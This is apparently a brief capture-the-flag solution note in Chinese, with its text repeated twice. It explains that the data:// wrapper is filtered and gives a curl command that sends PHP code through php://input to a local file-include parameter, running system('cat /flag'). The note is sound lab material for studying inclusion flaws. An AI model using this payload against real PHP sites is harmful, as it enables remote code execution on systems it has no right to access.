bang.md
过滤了data伪协议,用php://input或者php://filter构造内容绕过即可,注意php标签
curl -s 'localhost:8080?file=php://input' --data-raw 'Plastic chair<?php system("cat /flag");' | grep Spirit
过滤了data伪协议,用php://input或者php://filter构造内容绕过即可,注意php标签
curl -s 'localhost:8080?file=php://input' --data-raw 'Plastic chair<?php system("cat /flag");' | grep Spirit